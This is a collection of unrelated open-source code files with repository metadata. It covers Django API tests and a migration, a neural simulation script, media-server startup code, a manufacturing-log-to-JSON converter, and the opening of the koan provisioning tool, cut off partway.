return filename[filename.rfind('\\') + 1:filename.rfind('.')]
|
gpl-2.0
| 5,496,914,266,710,373,000 | 36.891089 | 75 | 0.628691 | false |
oser-cs/oser-website
|
tests/test_projects/test_edition_api.py
|
1
|
2146
|
"""Editions API tests."""
from rest_framework import status
from tests.utils import SimpleAPITestCase, logged_in
from projects.factory import EditionFactory, EditionFormFactory
class EditionEndpointsTest(SimpleAPITestCase):
"""Test access to the editions endpoints."""
factory = EditionFactory
read_expected_fields = {'id', 'url', 'name', 'year', 'project',
'description', 'organizers', 'participations',
'edition_form', 'participates'}
def setUp(self):
self.factory.create_batch(3)
def perform_list(self):
url = '/api/editions/'
response = self.client.get(url)
return response
def perform_retrieve(self, obj=None):
if obj is None:
obj = self.factory.create()
url = '/api/editions/{obj.pk}/'.format(obj=obj)
response = self.client.get(url)
return response
def test_list_requires_authentication(self):
self.assertRequiresAuth(
self.perform_list, expected_status_code=status.HTTP_200_OK)
@logged_in
def test_list_returns_expected_fields(self):
response = self.perform_list()
self.assertEqual(response.status_code, status.HTTP_200_OK)
fields = set(response.data[0])
self.assertSetEqual(fields, self.read_expected_fields)
def test_retrieve_requires_authentication(self):
self.assertRequiresAuth(
self.perform_retrieve, expected_status_code=status.HTTP_200_OK)
@logged_in
def test_retrieve_returns_expected_fields(self):
response = self.perform_retrieve()
self.assertEqual(response.status_code, status.HTTP_200_OK)
fields = set(response.data)
self.assertSetEqual(fields, self.read_expected_fields)
@logged_in
def test_list_open_registrations(self):
edition = self.factory.create()
EditionFormFactory.create(edition=edition)
url = '/api/editions/open_registrations/'
response = self.client.get(url)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(response.data), 1)
|
gpl-3.0
| 2,580,680,813,170,450,000 | 33.612903 | 75 | 0.653774 | false |
TiKunze/CanMics
|
src/python/01_SingleChannel/3pop/EIN/HeHiVariation/RUM_Detektor_HeHi_2ndversion_cluster.py
|
1
|
5917
|
# -*- coding: utf-8 -*-
"""
Created on Mon Jun 22 17:15:03 2015
@author: Tim Kunze
Copyright (C) 2015, Tim Kunze. All rights reserved.
This script is a modified version of the RUM Detector:
instead of sweeping over He and Hi in every diagram, we sweep over lenge and intensity of the impulse (as in the actiation plot)
"""
###############################################################################
#
# Imports
#
###############################################################################
import numpy as np
import sys
import scipy as sc
import os # to enable some C commands (cwd,listdir)
currpath = '/usr/wrk/people9/tiku2449/EI_RUM/001_Unifying_Framework/RUM_Exploration'
os.chdir(currpath)
import sys
sys.path.append("/usr/wrk/people9/tiku2449/EI_RUM/001_Unifying_Framework")
import Models.JuRClass_fin_006 as FCV
import Simulation_And_Analysis.Sim_Simulation_003 as simulate
while len(sys.argv) > 1:
option = sys.argv[1]; del sys.argv[1]
if option == '-he': he = float(sys.argv[1].replace(',','.')); del sys.argv[1]
elif option == '-hi': hi = float(sys.argv[1].replace(',','.')); del sys.argv[1]
else:
print 'Options invalides :',option,'->',sys.argv[0]
#%%
###############################################################################
#
# Main
#
###############################################################################
dt = 1000e-6
JR = FCV.JuR()
JR.integ_stepsize = dt
JR.n=2
JR.coupling = np.array([[0.0,0.0],[0.0,0.0]]) #
JR.distanceMatrix = np.array([[0.0,0.01],[0.0,0.0]]) # important!!
JR.init = np.zeros((8,JR.n))
JR.c_e=0 # only relevant for connected areas
JR.c_i=0 # only relevant for connected areas
JR.c_py=30 # only relevant for connected areas
JR.configure()
#%%
###############################################################################
#
## Activation Diagram RUM with modulation of input to II
#
###############################################################################
t_simulation = 5
N=t_simulation/dt
time = np.arange(0,N*dt,dt)
JR.H_e=he
JR.H_i=hi
p_sim_py = np.zeros((N,JR.n))
p_sim_e = np.zeros((N,JR.n))
p_sim_i = np.zeros((N,JR.n))
length_range = np.arange(500,1501,10)
intensity_range = np.arange(50,251,2)
state_grid = np.zeros((len(intensity_range),len(length_range),3))
i=0
j=0
for ins in intensity_range:
j=0
for le in length_range:
p_sim_e = np.zeros((N,JR.n))
p_sim_e[1000:1000+le,:] = ins
signal,sig_ei,sig_ii,impact,data = simulate.simulate_network_006(JR,p_sim_py,p_sim_e,p_sim_i,t_simulation)
state_grid[i,j,0] = np.mean(signal[999,0])
state_grid[i,j,1] = np.mean(signal[4000:,0])
state_grid[i,j,2] = np.max(signal[900:,0])
print "len: %.0f | int: %.0f | he: %.2fmV | hi: %2.fmV" %(le, ins, he*1000,hi*1000)
j+=1
i+=1
#dataa=length_range,intensity_range,state_grid
np.save('RUM_Dec_meas_full2_le500t1500i10msInt50t250i2_He%.2fmV_Hi%.1fmV.npy' %(he*1000,hi*1000),state_grid)
#np.save('RUM_Dec_sim_le500t1500i10msInt70t250i2_He%.2fmV_Hi%.1fmV.npy' %(he*1000,hi*1000),signal)
#np.save('RUM_Dec_data_le500t1500i10msInt70t250i2_He%.2fmV_Hi%.1fmV.npy' %(he*1000,hi*1000),dataa)
#
#
#def cleargrid(state_grid):
# [x,y,z]=np.shape(state_grid)
# for i in range(x):
# for j in range(y):
# if state_grid[i,j,1] > 0.004:
# state_grid[i,j,1] = 0.006
# elif state_grid[i,j,1] < 0.004:
# state_grid[i,j,1] = -0.002
# else:
# raise ValueError('Error')
# print "ERROR"
#
# return state_grid
###
#%% Analysis
#import matplotlib.pyplot as plt
#hirange = np.arange(19,26,1)*1e-3
#herange = np.arange(2.5,4.1,0.25)*1e-3
#
#
#glob_low_val=1e3
#glob_high_val=-1e3
#
#for he in herange:
# for hi in hirange:
# a=np.load('RUM_Detector2_Imple500t1500i10msInt70t250i2_He%.2fmV_Hi%.1fmV.npy' %(he*1000,hi*1000))
#
#
# length_range=a[0]
# intensity_range=a[1]
# state_grid=a[2]
#
# low_lenge=np.min(length_range)
# high_lenge=np.max(length_range)
# low_inte=np.min(intensity_range)
# high_inte=np.max(intensity_range)
#
# if np.min(state_grid[:,:,1]) < glob_low_val:
# glob_low_val=np.min(state_grid[:,:,1])
# print he,hi,glob_low_val
# if np.max(state_grid[:,:,1]) > glob_high_val:
# glob_high_val=np.max(state_grid[:,:,1])
# print he,hi,glob_high_val,1
#
# plt.figure(2)
# plt.clf()
# state_grid=cleargrid(state_grid)
# plt.imshow(np.flipud(state_grid[:,:,1]), aspect='auto', extent = (low_lenge,high_lenge,low_inte,high_inte),interpolation='none')
# plt.ylabel('intensity')
# plt.xlabel('length')
# plt.title('Detektor Diagram,he:%.0fms, hi:%.0fpps' %(he*1000,hi*1000))
# cb=plt.colorbar()
# plt.savefig('RUM_Detektor2_Imple500t1500i10msInt70t250i2_He%.2fmV_Hi%.1fmV.pdf' %(he*1000,hi*1000), format='pdf', dpi=1000)
# plt.close()
# #
#
# # baselevel plot hier zwecklos, da baselevel bei allen stimuli gleich
# plt.figure(2)
# plt.clf()
# #state_grid=cleargrid(state_grid)
# plt.clf()
# plt.imshow(np.flipud(state_grid[:,:,0]), aspect='auto', extent = (low_lenge,high_lenge,low_inte,high_inte),interpolation='none')
# plt.ylabel('intensity')
# plt.xlabel('length')
# plt.title('Detektor Diagram,Baselevels,he:%.0fmV, hi:%.0fmV' %(he*1000,hi*1000))
# plt.colorbar()
# #plt.savefig('RUM_Detektor_Baselevel_Imple%.0fmsInt%.0f_He2.5t7.0i0k05_Hi10t25i0k1_1.pdf' %(lenge,inte), format='pdf', dpi=1000)
#
# plt.close('all')
|
gpl-3.0
| 4,919,975,346,268,894,000 | 29.979058 | 137 | 0.540984 | false |
junkcollector/PlexNMT-100
|
PlexNMT.py
|
1
|
3652
|
#!/usr/bin/env python
"""
PlexNMT
Sources:
PlexConnect: https://github.com/iBaa/PlexConnect/wiki
inter-process-communication (queue): http://pymotw.com/2/multiprocessing/communication.html
"""
import sys, time
from os import sep
import socket
from multiprocessing import Process, Pipe
import signal, errno
from Version import __VERSION__
import WebServer
import Settings
from Debug import * # dprint()
def getIP_self():
cfg = param['CSettings']
if cfg.getSetting('enable_plexnmt_autodetect')=='True':
# get public ip of machine running PlexNMT
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(('1.2.3.4', 1000))
IP = s.getsockname()[0]
dprint('PlexNMT', 0, "IP_self: "+IP)
else:
# manual override from "settings.cfg"
IP = cfg.getSetting('ip_plexnmt')
dprint('PlexNMT', 0, "IP_self (from settings): "+IP)
return IP
procs = {}
pipes = {}
param = {}
running = False
def startup():
global procs
global pipes
global param
global running
# Settings
cfg = Settings.CSettings()
param['CSettings'] = cfg
# Logfile
if cfg.getSetting('logpath').startswith('.'):
# relative to current path
logpath = sys.path[0] + sep + cfg.getSetting('logpath')
else:
# absolute path
logpath = cfg.getSetting('logpath')
param['LogFile'] = logpath + sep + 'PlexNMT.log'
param['LogLevel'] = cfg.getSetting('loglevel')
dinit('PlexNMT', param, True) # init logging, new file, main process
dprint('PlexNMT', 0, "Version: {0}", __VERSION__)
dprint('PlexNMT', 0, "Python: {0}", sys.version)
dprint('PlexNMT', 0, "Host OS: {0}", sys.platform)
# more Settings
param['IP_self'] = getIP_self()
# param['HostToIntercept'] = cfg.getSetting('hosttointercept')
# param['baseURL'] = 'http://'+ param['HostToIntercept']
running = True
# init WebServer
if running:
master, slave = Pipe() # endpoint [0]-PlexNMT, [1]-WebServer
proc = Process(target=WebServer.Run, args=(slave, param))
proc.start()
time.sleep(0.1)
if proc.is_alive():
procs['WebServer'] = proc
pipes['WebServer'] = master
else:
dprint('PlexNMT', 0, "WebServer not alive. Shutting down.")
running = False
# not started successful - clean up
if not running:
cmdShutdown()
shutdown()
return running
def run():
while running:
# do something important
try:
time.sleep(60)
except IOError as e:
if e.errno == errno.EINTR and not running:
pass # mask "IOError: [Errno 4] Interrupted function call"
else:
raise
def shutdown():
for slave in procs:
procs[slave].join()
dprint('PlexNMT', 0, "shutdown")
def cmdShutdown():
global running
running = False
# send shutdown to all pipes
for slave in pipes:
pipes[slave].send('shutdown')
dprint('PlexNMT', 0, "Shutting down.")
def sighandler_shutdown(signum, frame):
signal.signal(signal.SIGINT, signal.SIG_IGN) # we heard you!
cmdShutdown()
if __name__=="__main__":
signal.signal(signal.SIGINT, sighandler_shutdown)
signal.signal(signal.SIGTERM, sighandler_shutdown)
dprint('PlexNMT', 0, "***")
dprint('PlexNMT', 0, "PlexNMT")
dprint('PlexNMT', 0, "Press CTRL-C to shut down.")
dprint('PlexNMT', 0, "***")
success = startup()
if success:
run()
shutdown()
|
mit
| -6,980,175,735,864,880,000 | 23.843537 | 91 | 0.592278 | false |
annelisebouyer/datawrapper
|
test/api.test.py
|
1
|
4387
|
#
# test script for Datawrapper API
#
import requests
import os
import json
from random import randint
import yaml
config = yaml.load(open('../config.yaml').read())
domain = 'http://' + config['domain']
if 'DATAWRAPPER_DOMAIN' in os.environ:
domain = os.environ['DATAWRAPPER_DOMAIN']
endpoint = domain + '/api/'
import unittest
print 'testing on ' + domain
ns = {
'chartId': None,
'session': requests.Session()
}
# create new chart
class TestDatawrapperAPI(unittest.TestCase):
def checkRes(self, r):
self.assertIsInstance(r.json(), dict)
self.assertEqual(r.json()['status'], 'ok')
if r.json()['status'] == 'error':
print r.json()['message']
def test_01_create_new_chart(self):
global ns
r = ns['session'].post(endpoint + 'charts')
self.checkRes(r)
ns['chartId'] = r.json()['data'][0]['id']
def test_02_set_chart_data(self):
data = 'some,data,to,send\nanother,row,to,send\n'
url = endpoint + 'charts/%s/data' % ns['chartId']
r = ns['session'].put(url, data=data)
self.checkRes(r)
# check that data was set correctly
r = ns['session'].get(url)
self.assertEqual(r.text, data)
def test_03_upload_chart_data(self):
files = {'qqfile': (
'report.csv', 'other,data,to,send\nanother,row,to,send\n')}
url = endpoint + 'charts/%s/data' % ns['chartId']
r = ns['session'].post(url, files=files)
self.checkRes(r)
# check that data was set correctly
r = ns['session'].get(url)
self.assertEqual(r.text, files['qqfile'][1])
def test_04_get_chart_meta(self):
url = endpoint + 'charts/%s' % ns['chartId']
r = ns['session'].get(url)
self.checkRes(r)
self.assertEqual(r.json()['data']['showInGallery'], False)
def test_05_saveMetadata(self):
url = endpoint + 'charts/%s' % ns['chartId']
r = ns['session'].get(url)
self.checkRes(r)
data = r.json()['data']
data['title'] = 'My cool new chart'
data['metadata']['describe']['source-name'] = 'Example Data Source'
data['metadata']['describe']['source-url'] = 'http://example.org'
r = ns['session'].put(url, data=json.dumps(data))
self.checkRes(r)
# self.assertEqual(r.json()['data']['showInGallery'], False)
def test_06_gallery(self):
url = endpoint + 'gallery'
r = ns['session'].get(url)
self.checkRes(r)
def test_06_visualizations(self):
url = endpoint + 'visualizations'
r = ns['session'].get(url)
self.checkRes(r)
self.assertIsInstance(r.json()['data'], list)
def test_07_bar_chart(self):
url = endpoint + 'visualizations/bar-chart'
r = ns['session'].get(url)
self.checkRes(r)
self.assertIsInstance(r.json()['data'], dict)
def test_08_account(self):
url = endpoint + 'account'
r = ns['session'].get(url)
self.checkRes(r)
self.assertIn('user', r.json()['data'])
self.assertIsInstance(r.json()['data']['user'], dict)
def test_09_set_lang_to_fr(self):
url = endpoint + 'account/lang'
r = ns['session'].put(url, data=json.dumps(dict(lang='fr')))
self.checkRes(r)
def test_10_check_lang_is_fr(self):
url = endpoint + 'account/lang'
r = ns['session'].get(url)
self.checkRes(r)
self.assertEqual(r.json()['data'], 'fr')
def test_11_charts(self):
url = endpoint + 'charts'
r = ns['session'].get(url)
self.checkRes(r)
self.assertEqual(len(r.json()['data']), 1)
def test_11a_charts_sorted(self):
url = endpoint + 'charts?order=theme'
r = ns['session'].get(url)
self.checkRes(r)
self.assertEqual(len(r.json()['data']), 1)
def test_12_estimate_job(self):
url = endpoint + 'jobs/export/estimate'
r = ns['session'].get(url)
self.checkRes(r)
def test_13_create_user(self):
url = endpoint + '/users'
password = '1234'
body = dict(pwd=password, pwd2=password,
email=('test-%d@' + config['domain']) % randint(10000, 99999))
r = ns['session'].post(url, data=json.dumps(body))
self.checkRes(r)
if __name__ == '__main__':
unittest.main()
|
mit
| 4,377,913,288,608,271,000 | 29.678322 | 82 | 0.569182 | false |
cfangmeier/UNL-Gantry-Encapsulation-Monitoring
|
Logs2JSON.py
|
1
|
10923
|
#!/usr/bin/env python3
import io
import re
import json
import pydoc
import zipfile
import traceback
import argparse
import collections
from datetime import datetime
import urllib.request as request
from itertools import count
Vec3d = collections.namedtuple('Vec3d', 'x,y,z')
Orient3d = collections.namedtuple('Orient3d', 'x,y,z,q')
def parse_potting_datetime(pot_log_line):
dt_str = pot_log_line.split('>>>')[0].strip()
return datetime.strptime(dt_str, '%d/%m/%Y %I:%M:%S %p')
def parse_gluing_datetime(glue_log_line, just_date=False):
colon_pos = glue_log_line.find(':')
dt_str = glue_log_line[colon_pos+1:].strip()
if just_date:
return datetime.strptime(dt_str, '%m/%d/%Y')
else:
return datetime.strptime(dt_str, '%d/%m/%Y-%H:%M:%S')
def datetime2str(dt, just_date=False):
if just_date:
return dt.strftime('%d/%m/%Y')
else:
return dt.strftime('%d/%m/%Y-%H:%M:%S')
def hdi2moduleid(hdi_id):
try:
url_base = ("http://inky.physics.purdue.edu/cmsfpix/"
"/Submission_p/summary/hdi.php?name={}")
response = request.urlopen(url_base.format(hdi_id))
data = response.read().decode('utf8')
return re.findall('M-.-.-..?', data)[0]
except IndexError:
return None
def page(s):
pydoc.pager(str(s))
def load_gluing_logs(zipfile_name):
zf = zipfile.ZipFile(zipfile_name)
logs = collections.OrderedDict()
fnames = [z.filename for z in zf.filelist]
for fname in sorted(fnames):
with zf.open(fname) as f:
log = f.read().decode('utf8').split('\n')
logs[fname] = (fname, log)
return list(logs.values())
def parse_gluing_log(log):
def value(line):
return line.split(':')[1].strip()
date = parse_gluing_datetime(log[4], just_date=True)
date = datetime2str(date, just_date=True)
start_time = parse_gluing_datetime(log[5])
start_time = datetime2str(start_time)
finish_time = parse_gluing_datetime(log[10])
finish_time = datetime2str(finish_time)
operator = value(log[6])
software_version = value(log[7])
pressure = value(log[11])
araldite_batch = value(log[12])
chuck = value(log[18])
lines = [l.strip() for l in log[22:30]]
modules = {}
for i, (bbm_id, hdi_id) in enumerate(zip(lines[:-1:2], lines[1::2])):
if bbm_id in {'glass', '---'} or hdi_id in {'kapton', '---'}:
continue
mod_id = hdi2moduleid(hdi_id)
module = {'module_id': mod_id,
'hdi_id': hdi_id,
'bbm_id': bbm_id,
'date': date,
'start_time': start_time,
'finish_time': finish_time,
'operator': operator,
'software_version': software_version,
'pressure': pressure,
'araldite_batch': araldite_batch,
'chuck': chuck,
'slot': i+1,
}
modules[mod_id] = module
return modules
def load_potting_logs(full_zipfile_name):
fullzf = zipfile.ZipFile(full_zipfile_name)
fname_re = re.compile('Config-(.*).zip')
logs = collections.OrderedDict()
zip_fnames = [z.filename for z in fullzf.filelist]
for zip_fname in sorted(zip_fnames):
short_fname = fname_re.findall(zip_fname)[0]
# Extract inner zipfile
with fullzf.open(zip_fname) as f:
b = io.BytesIO(f.read())
# Open extracted zipfile and read Potting.log into memory
zf = zipfile.ZipFile(b)
with zf.open("Potting.log") as f:
log = f.read().decode('utf8').split('\n')
logs[short_fname] = (short_fname, log)
return list(logs.values())
def parse_potting_log(log):
time_start = parse_potting_datetime(log[0])
for i in count(1): # Read from end of file looking for last timestamp
try:
time_finish = parse_potting_datetime(log[-i])
break
except ValueError:
continue
time_taken = (time_finish - time_start).seconds // 60
def split_sections(log):
sec_re = re.compile(('(Configure Tester|Inspect Fiducials|'
'Review Fiducials|Inspect Modules|'
'Review Modules|Load Sylgard|'
'Align Needle|Purge|Pot|Finish) '
'has been executed successfully'))
sections = {}
sec_curr_lines = []
for line in log:
res = sec_re.findall(line)
if not res:
sec_curr_lines.append(line)
else:
sections[res[0]] = sec_curr_lines
sec_curr_lines = []
return sections
def parse_tablestate(lines):
modules = {}
reg = re.compile("Chuck: (\d+), Slot: (\d+), S/N: (.*), State: (.*)$")
for line in lines:
res = reg.findall(line.strip())
if not res:
continue
res = res[0]
if res[3] != "Empty":
chuck = res[0]
slot = res[1]
id_ = res[2]
ts = datetime2str(time_start)
tf = datetime2str(time_finish)
pd = datetime2str(time_start, just_date=True)
modules[(chuck, slot)] = {'module_id': id_,
'chuck': chuck,
'slot': slot,
'HDI_fids': {},
'BBM_fids': {},
'pot_lines': {},
'time_start': ts,
'time_end': tf,
'time_taken': time_taken,
'date': pd}
return modules
def parse_alignment(lines, modules):
reg_fid = re.compile(('Chuck (\d+) Slot (\d+): , '
'(BBM|HDI) Fiducial (.*): Source: (.*), '
'Image Position: ([\d.]*),([\d.]*),([\d.]*), '
'Image Coor?dinate: ([\d.]*),([\d.]*),([\d.]*), '
'Fiducial Position: ([\d.]*),([\d.]*),([\d.]*)'))
reg_mod = re.compile(('Chuck (\d+) Slot (\d+): , (BBM|HDI) '
'Center:([\d.]*),([\d.]*),([\d.]*) '
'Orientation:([\d.-]*),([\d.-]*),'
'([\d.-]*),([\d.-]*) '
'Rotation:([\d.-]*) degrees'))
for line in lines:
res_fid = reg_fid.findall(line)
if res_fid:
res = res_fid[0]
mod = modules[(res[0], res[1])]
fid = {'name': res[3],
'source': res[4],
'img_pos': Vec3d(*res[5:8]),
'img_crd': Vec3d(*res[8:11]),
'fid_pos': Vec3d(*res[11:14])}
mod[res[2]+'_fids'][res[3]] = fid
res_mod = reg_mod.findall(line)
if res_mod:
res = res_mod[0]
mod = modules[(res[0], res[1])]
mod[res[2]+'_center'] = Vec3d(*res[3:6])
mod[res[2]+'_orient'] = Orient3d(*res[6:10])
mod[res[2]+'_rotatn'] = res[10]
def parse_potting_lines(lines, modules):
reg = re.compile(('Chuck (\d+) Slot (\d+): : (.*), '
'Global: ([\d.-]*),([\d.-]*),([\d.-]*)->'
'([\d.-]*),([\d.-]*),([\d.-]*), '
'Local: ([\d.-]*),([\d.-]*),([\d.-]*)->'
'([\d.-]*),([\d.-]*),([\d.-]*), '
'(Enabled|Disabled)'))
for line in lines:
res = reg.findall(line)
if res:
res = res[0]
mod = modules[(res[0], res[1])]
line = {'global': {'start': Vec3d(*res[3:6]),
'end': Vec3d(*res[6:9])},
'local': {'start': Vec3d(*res[9:12]),
'end': Vec3d(*res[12:15])},
'state': res[15]}
mod['pot_lines'][res[2]] = line
def parse_finish(lines, modules):
reg = re.compile('(Operator Name|Sylgard Batch|Pressure):(.*$)')
for line in lines:
res = reg.findall(line)
if res:
res = res[0]
for module in modules.values():
key = res[0].lower().replace(" ", "_")
module[key] = res[1].strip()
secs = split_sections(log)
modules = parse_tablestate(secs['Configure Tester'])
parse_alignment(secs['Review Fiducials'], modules)
parse_potting_lines(secs['Pot'], modules)
parse_finish(secs['Finish'], modules)
time = (time_finish-time_start).seconds // 60
return list(modules.values()), time
def process_potting_logs(full_zipfile_name):
logs = load_potting_logs(full_zipfile_name)
modules = []
for filename, log in logs:
try:
mods, time = parse_potting_log(log)
time //= len(mods)
for mod in mods:
mod['time'] = time
mod['source_file'] = filename
print("parsed {} modules from {}".format(len(mods), filename))
modules += mods
except KeyError as e:
print("file: {} Has invalid format, skipping...".format(filename))
traceback.print_exc()
print(e)
return modules
def process_gluing_logs(zipfile_name):
logs = load_gluing_logs(zipfile_name)
modules = {}
for log_file, log in logs[-5:]:
modules.update(parse_gluing_log(log))
return modules.values()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description=('Convert manufacturing '
'log files to json'))
arg = parser.add_argument
arg('--pottinglog', help='Zipfile containing Potting log files')
arg('--gluinglog', help='Zipfile containing Gluing log files')
args = parser.parse_args()
pot_logs = {}
glue_logs = {}
if args.pottinglog is not None:
pot_logs = process_potting_logs(args.pottinglog)
if args.gluinglog is not None:
glue_logs = process_gluing_logs(args.gluinglog)
logs = collections.defaultdict(dict)
for log in pot_logs:
mod_id = log.pop('module_id').upper()
logs[mod_id]['potting'] = log
for log in glue_logs:
if log['module_id'] is None:
continue
mod_id = log.pop('module_id').upper()
logs[mod_id]['gluing'] = log
enc = json.JSONEncoder(indent=' ')
with open('Potting_Logs.json', 'w') as f:
f.write(enc.encode(logs))
|
mit
| 165,149,412,829,744,670 | 35.654362 | 79 | 0.483017 | false |
philgyford/django-spectator
|
spectator/events/migrations/0042_auto_20200407_1039.py
|
1
|
1302
|
# Generated by Django 3.0.5 on 2020-04-07 10:39
import django.core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("spectator_events", "0041_event_ticket"),
]
operations = [
migrations.AlterField(
model_name="venue",
name="cinema_treasures_id",
field=models.PositiveIntegerField(
blank=True,
help_text='Optional. ID of a cinema at\n<a href="http://cinematreasures.org/">Cinema Treasures</a>.', # noqa: E501
null=True,
),
),
migrations.AlterField(
model_name="work",
name="imdb_id",
field=models.CharField(
blank=True,
help_text="Starts with 'tt', e.g. 'tt0100842'.\nFrom <a href=\"https://www.imdb.com\">IMDb</a>.", # noqa: E501
max_length=12,
validators=[
django.core.validators.RegexValidator(
code="invalid_imdb_id",
message='IMDb ID should be like "tt1234567"',
regex="^tt\\d{7,10}$",
)
],
verbose_name="IMDb ID",
),
),
]
|
mit
| -8,364,434,065,121,548,000 | 31.55 | 131 | 0.490015 | false |
spotify/cobbler
|
koan/app.py
|
1
|
71889
|
"""
koan = kickstart over a network
a tool for network provisioning of virtualization (xen,kvm/qemu,vmware)
and network re-provisioning of existing Linux systems.
used with 'cobbler'. see manpage for usage.
Copyright 2006-2008 Red Hat, Inc and Others.
Michael DeHaan <michael.dehaan AT gmail>
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
02110-1301 USA
"""
import random
import os
import traceback
import tempfile
import shlex
ANCIENT_PYTHON = 0
try:
try:
from optparse import OptionParser
except:
from opt_parse import OptionParser # importing this for backwards compat with 2.2
try:
import subprocess as sub_process
except:
import sub_process
except:
# the main "replace-self" codepath of koan must support
# Python 1.5. Other sections may use 2.3 features (nothing newer)
# provided they are conditionally imported. This is to support
# EL 2.1. -- mpd
ANCIENT_PYTHON = 1
True = 1
False = 0
import exceptions
import time
import shutil
import errno
import re
import sys
import xmlrpclib
import string
import glob
import socket
import utils
import time
import configurator
COBBLER_REQUIRED = 1.300
"""
koan --virt [--profile=webserver|--system=name] --server=hostname
koan --replace-self --profile=foo --server=hostname [--kexec]
"""
DISPLAY_PARAMS = [
"name",
"distro","profile",
"kickstart","ks_meta",
"install_tree","kernel","initrd",
"netboot_enabled",
"kernel_options",
"repos",
"virt_ram",
"virt_disk",
"virt_disk_driver",
"virt_type",
"virt_path",
"virt_auto_boot",
]
def main():
"""
Command line stuff...
"""
try:
utils.setupLogging("koan")
except:
# most likely running RHEL3, where we don't need virt logging anyway
pass
if ANCIENT_PYTHON:
print "- command line usage on this version of python is unsupported"
print "- usage via spacewalk APIs only. Python x>=2.3 required"
return
p = OptionParser()
p.add_option("-k", "--kopts",
dest="kopts_override",
help="append additional kernel options")
p.add_option("-l", "--list",
dest="list_items",
help="lists remote items (EX: profiles, systems, or images)")
p.add_option("-v", "--virt",
dest="is_virt",
action="store_true",
help="install new virtual guest")
p.add_option("-u", "--update-files",
dest="is_update_files",
action="store_true",
help="update templated files from cobbler config management")
p.add_option("-c", "--update-config",
dest="is_update_config",
action="store_true",
help="update system configuration from cobbler config management")
p.add_option("", "--summary",
dest="summary",
action="store_true",
help="print configuration run stats")
p.add_option("-V", "--virt-name",
dest="virt_name",
help="use this name for the virtual guest")
p.add_option("-r", "--replace-self",
dest="is_replace",
action="store_true",
help="reinstall this host at next reboot")
p.add_option("-D", "--display",
dest="is_display",
action="store_true",
help="display the configuration stored in cobbler for the given object")
p.add_option("-p", "--profile",
dest="profile",
help="use this cobbler profile")
p.add_option("-y", "--system",
dest="system",
help="use this cobbler system")
p.add_option("-i", "--image",
dest="image",
help="use this cobbler image")
p.add_option("-s", "--server",
dest="server",
default=os.environ.get("COBBLER_SERVER",""),
help="attach to this cobbler server")
p.add_option("-S", "--static-interface",
dest="static_interface",
help="use static network configuration from this interface while installing")
p.add_option("-t", "--port",
dest="port",
help="cobbler port (default 80)")
p.add_option("-w", "--vm-poll",
dest="should_poll",
action="store_true",
help="for xen/qemu/KVM, poll & restart the VM after the install is done")
p.add_option("-P", "--virt-path",
dest="virt_path",
help="override virt install location")
p.add_option("", "--force-path",
dest="force_path",
action="store_true",
help="Force overwrite of virt install location")
p.add_option("-T", "--virt-type",
dest="virt_type",
help="override virt install type")
p.add_option("-B", "--virt-bridge",
dest="virt_bridge",
help="override virt bridge")
p.add_option("-n", "--nogfx",
action="store_true",
dest="no_gfx",
help="disable Xen graphics (xenpv,xenfv)")
p.add_option("", "--virt-auto-boot",
action="store_true",
dest="virt_auto_boot",
help="set VM for autoboot")
p.add_option("", "--add-reinstall-entry",
dest="add_reinstall_entry",
action="store_true",
help="when used with --replace-self, just add entry to grub, do not make it the default")
p.add_option("-C", "--livecd",
dest="live_cd",
action="store_true",
help="used by the custom livecd only, not for humans")
p.add_option("", "--kexec",
dest="use_kexec",
action="store_true",
help="Instead of writing a new bootloader config when using --replace-self, just kexec the new kernel and initrd")
p.add_option("", "--no-copy-default",
dest="no_copy_default",
action="store_true",
help="Do not copy the kernel args from the default kernel entry when using --replace-self")
p.add_option("", "--embed",
dest="embed_kickstart",
action="store_true",
help="When used with --replace-self, embed the kickstart in the initrd to overcome potential DHCP timeout issues. (seldom needed)")
p.add_option("", "--qemu-disk-type",
dest="qemu_disk_type",
help="when used with --virt_type=qemu, add select of disk driver types: ide,scsi,virtio")
p.add_option("", "--qemu-net-type",
dest="qemu_net_type",
help="when used with --virt_type=qemu, select type of network device to use: e1000, ne2k_pci, pcnet, rtl8139, virtio")
p.add_option("", "--qemu-machine-type",
dest="qemu_machine_type",
help="when used with --virt_type=qemu, select type of machine type to emulate: pc, pc-1.0, pc-0.15")
(options, args) = p.parse_args()
try:
k = Koan()
k.list_items = options.list_items
k.server = options.server
k.is_virt = options.is_virt
k.is_update_files = options.is_update_files
k.is_update_config = options.is_update_config
k.summary = options.summary
k.is_replace = options.is_replace
k.is_display = options.is_display
k.profile = options.profile
k.system = options.system
k.image = options.image
k.live_cd = options.live_cd
k.virt_path = options.virt_path
k.force_path = options.force_path
k.virt_type = options.virt_type
k.virt_bridge = options.virt_bridge
k.no_gfx = options.no_gfx
k.add_reinstall_entry = options.add_reinstall_entry
k.kopts_override = options.kopts_override
k.static_interface = options.static_interface
k.use_kexec = options.use_kexec
k.no_copy_default = options.no_copy_default
k.should_poll = options.should_poll
k.embed_kickstart = options.embed_kickstart
k.virt_auto_boot = options.virt_auto_boot
k.qemu_disk_type = options.qemu_disk_type
k.qemu_net_type = options.qemu_net_type
k.qemu_machine_type = options.qemu_machine_type
if options.virt_name is not None:
k.virt_name = options.virt_name
if options.port is not None:
k.port = options.port
k.run()
except Exception, e:
(xa, xb, tb) = sys.exc_info()
try:
getattr(e,"from_koan")
print str(e)[1:-1] # nice exception, no traceback needed
except:
print xa
print xb
print string.join(traceback.format_list(traceback.extract_tb(tb)))
return 1
return 0
#=======================================================
class InfoException(exceptions.Exception):
"""
Custom exception for tracking of fatal errors.
"""
def __init__(self,value,**args):
self.value = value % args
self.from_koan = 1
def __str__(self):
return repr(self.value)
#=======================================================
class Koan:
def __init__(self):
"""
Constructor. Arguments will be filled in by optparse...
"""
self.server = None
self.system = None
self.profile = None
self.list_profiles = None
self.list_systems = None
self.is_virt = None
self.is_update_files = None
self.is_update_config = None
self.summary = None
self.is_replace = None
self.port = None
self.static_interface = None
self.virt_name = None
self.virt_type = None
